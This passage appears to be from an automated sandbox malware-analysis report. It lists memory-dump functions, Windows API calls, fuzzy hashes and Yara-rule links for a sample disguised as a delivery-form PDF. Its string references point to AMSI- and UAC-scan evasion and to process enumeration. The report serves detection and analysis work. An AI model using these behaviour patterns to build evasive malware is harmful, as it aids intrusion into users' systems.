                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID: 0`
                                                                                          • API String ID: 4275171209-3339448193
                                                                                          • Opcode ID: ecf779bd698f2703e799b4b36a48a6d74feb2434444006938538301db86167c3
                                                                                          • Instruction ID: e85eafc04d2fd3e40374937f0f94d21612fd1e6499fcd2a4b71cc1821d109797
                                                                                          • Opcode Fuzzy Hash: ecf779bd698f2703e799b4b36a48a6d74feb2434444006938538301db86167c3
                                                                                          • Instruction Fuzzy Hash: F0F049F0B453005FEB06DF799D643217AD6E789348F188579E749DB398E77198018B00
                                                                                          Function 0293E384 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitVariant
                                                                                          • String ID:
                                                                                          • API String ID: 1927566239-0
                                                                                          • Opcode ID: 30dcea4dc4f714d78a742e8f214277ca7ec8135a58e6d79ccbedbeca11bfa87d
                                                                                          • Instruction ID: d2828e1d1d3a352d8331beb159307248a1d0db8a93c8b1072f3d4da433c316fd
                                                                                          • Opcode Fuzzy Hash: 30dcea4dc4f714d78a742e8f214277ca7ec8135a58e6d79ccbedbeca11bfa87d
                                                                                          • Instruction Fuzzy Hash: 95314A71A00209ABDB12DEA8C988ABE77ADEF4C324F444561F999D2240D734E951CBA2
                                                                                          Function 02946CF4 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CLSIDFromProgID.OLE32(00000000,?,00000000,02946D41,?,?,?,00000000), ref: 02946D21
                                                                                            • Part of subcall function 02934C0C: SysFreeString.OLEAUT32(0294E950), ref: 02934C1A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeFromProgString
                                                                                          • String ID:
                                                                                          • API String ID: 4225568880-0
                                                                                          • Opcode ID: 9ee134be36d89f6ce2a753af500e568cbec6fdd447ecf573efce8ee94b19d021
                                                                                          • Instruction ID: cfdf96230fbf5456810d0d2970f1ef9863cee9df290611045614f1064d1cc0ca
                                                                                          • Opcode Fuzzy Hash: 9ee134be36d89f6ce2a753af500e568cbec6fdd447ecf573efce8ee94b19d021
                                                                                          • Instruction Fuzzy Hash: 6FE06D71604708BBEB12EBA1DC51DAA77EEEFCAB10B524471E801D3650DA74AE009860
                                                                                          Function 02935814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(02930000,?,00000105), ref: 02935832
                                                                                            • Part of subcall function 02935A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02930000,0295D790), ref: 02935A94
                                                                                            • Part of subcall function 02935A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02930000,0295D790), ref: 02935AB2
                                                                                            • Part of subcall function 02935A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02930000,0295D790), ref: 02935AD0
                                                                                            • Part of subcall function 02935A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02935AEE
                                                                                            • Part of subcall function 02935A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02935B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02935B37
                                                                                            • Part of subcall function 02935A78: RegQueryValueExA.ADVAPI32(?,02935CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02935B7D,?,80000001), ref: 02935B55
                                                                                            • Part of subcall function 02935A78: RegCloseKey.ADVAPI32(?,02935B84,00000000,?,?,00000000,02935B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02935B77
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Open$FileModuleNameQueryValue$Close
                                                                                          • String ID:
                                                                                          • API String ID: 2796650324-0
                                                                                          • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                          • Instruction ID: e62c89e50368be2d7adc044f3fd8f499c6fd9d175c2a7ea7e898607661c9eff7
                                                                                          • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                          • Instruction Fuzzy Hash: F6E065B1A002148BCB11DEA888C0AA737D8AB0C750F8109A5EC58DF34AD3B0DD208BE0
                                                                                          Function 02937D9C Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02937DB0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3934441357-0
                                                                                          • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                          • Instruction ID: bed691df9398c0df3bc2ceea4852be45d52a1f0366026e675ce5f55f2f5de830
                                                                                          • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                          • Instruction Fuzzy Hash: E2D05BB63081107AD220995E6C44EF75BDCCFC9770F100639B668C7180D7208C018671
                                                                                          Function 02937E18 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,0294F8CC,ScanString,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,ScanString,0299137C,0295AFD8,UacScan,0299137C,0295AFD8,UacInitialize), ref: 02937E23
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          • Opcode ID: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                                                                                          • Instruction ID: 7dcde3173e757dbbf4b68a2c718f66b61aae7b61d528723070e4c86e6a4a29e7
                                                                                          • Opcode Fuzzy Hash: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                                                                                          • Instruction Fuzzy Hash: 93C08CE22023000A6A62A1FC0CC408B42CC49842383A41B35B038CA3E2D32188222460
                                                                                          Function 02937E3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,02952A49,ScanString,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,ScanBuffer,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,Initialize), ref: 02937E47
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          • Opcode ID: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                                                                                          • Instruction ID: 39cd7907b0158be1d275b467cd036abeb579ed540d78553dec0a374b65ddbda1
                                                                                          • Opcode Fuzzy Hash: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                                                                                          • Instruction Fuzzy Hash: FAC08CE12023040E5E62A2FC1CC02DA42CE49847343A02B31E038DA2E2D311D8222410
                                                                                          Function 02934C24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeString
                                                                                          • String ID:
                                                                                          • API String ID: 3341692771-0
                                                                                          • Opcode ID: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                                          • Instruction ID: 563cb31c968388f225178d87cbc84b6bd5d7961395f58ae05de9ad4380fbf120
                                                                                          • Opcode Fuzzy Hash: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                                          • Instruction Fuzzy Hash: B1C012A260022447EF225A989CC079562CCEB45295B1510A1D408D7250E3A49C004A64
                                                                                          Function 02934C48 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SysFreeString.OLEAUT32(0294E950), ref: 02934C1A
                                                                                          • SysReAllocStringLen.OLEAUT32(0295BE78,0294E950,000000B4), ref: 02934C62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: String$AllocFree
                                                                                          • String ID:
                                                                                          • API String ID: 344208780-0
                                                                                          • Opcode ID: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                                                                                          • Instruction ID: 6cf23a0179406adc89336559fa3dea393fc99050092ca2eae8ecc7351abc6cca
                                                                                          • Opcode Fuzzy Hash: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                                                                                          • Instruction Fuzzy Hash: DDD080745001015DAF2F9E5549449B7737EADD130634FE65DDC024E250EB25CC00CA31
                                                                                          Function 0295BB50 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • timeSetEvent.WINMM(00002710,00000000,0295BB44,00000000,00000001), ref: 0295BB60
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Eventtime
                                                                                          • String ID:
                                                                                          • API String ID: 2982266575-0
                                                                                          • Opcode ID: 2aa8fd0a9e717a264b39c701b3dc6fe7d16956e6d099736a5dc7503318ca7fed
                                                                                          • Instruction ID: c61c735e8e099f4970710fa987ed244c694b85c2d4868ff841ef5aabe923fa4d
                                                                                          • Opcode Fuzzy Hash: 2aa8fd0a9e717a264b39c701b3dc6fe7d16956e6d099736a5dc7503318ca7fed
                                                                                          • Instruction Fuzzy Hash: DBC092F0B807003EF62196A82CD2F2362CEE344B04F600816BE00FE2D5EAE28C601B25
                                                                                          Function 02934BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02934BEB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocString
                                                                                          • String ID:
                                                                                          • API String ID: 2525500382-0
                                                                                          • Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                                          • Instruction ID: 5757340d3c46417871550e7ea9eba3ff9e2e61659c9a9d1cdb6509046891c1bb
                                                                                          • Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                                          • Instruction Fuzzy Hash: 28B0123C64820218FB1316610D00BBB00AC5F91387F8620959E38C80D0FF00C4108832
                                                                                          Function 02934BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 02934C03
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeString
                                                                                          • String ID:
                                                                                          • API String ID: 3341692771-0
                                                                                          • Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                          • Instruction ID: fc6315be2a3ab78e9e9dd5ca11348f9c2f5cc95ccf1093f0a3bdd6006d7c504a
                                                                                          • Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                          • Instruction Fuzzy Hash: DCA022AC0003030A8F0B232C000002A203B3FE03003CBC0E800000A0208F3AC000AC30
                                                                                          Function 02931682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02932000), ref: 029316A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 1391130af4dbc43f26a43d71f4e52d0d921caa2e5c772a8b7849bc469733e24d
                                                                                          • Instruction ID: 5867cfa66a39f610caf152e682e50f8480590ba305d77f4238e304dcb008e5c0
                                                                                          • Opcode Fuzzy Hash: 1391130af4dbc43f26a43d71f4e52d0d921caa2e5c772a8b7849bc469733e24d
                                                                                          • Instruction Fuzzy Hash: F9F09AB2A447956BD7119E9E9C80B92BB98FB40334F054139EA589B340D771A8108BD4
                                                                                          Function 029316E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02931704
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 1263568516-0
                                                                                          • Opcode ID: 308865c6e9591cdea9abcf2e9558b79d17f489ff8bca0f9ffc28d793ea435442
                                                                                          • Instruction ID: 73ac9c98b43765705d02617469eb717c0fba42ebe527c6483e55b196f5c5a177
                                                                                          • Opcode Fuzzy Hash: 308865c6e9591cdea9abcf2e9558b79d17f489ff8bca0f9ffc28d793ea435442
                                                                                          • Instruction Fuzzy Hash: D8E0CD753003016FD7115B7D5D407137BDCFB84764F184475F54ADB261D660E8108B64

                                                                                          Non-executed Functions

                                                                                          Function 0294A95C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0294ABE3,?,?,0294AC75,00000000,0294AD51), ref: 0294A970
                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0294A988
                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0294A99A
                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0294A9AC
                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0294A9BE
                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0294A9D0
                                                                                          • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0294A9E2
                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0294A9F4
                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0294AA06
                                                                                          • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0294AA18
                                                                                          • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0294AA2A
                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0294AA3C
                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0294AA4E
                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0294AA60
                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0294AA72
                                                                                          • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0294AA84
                                                                                          • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0294AA96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
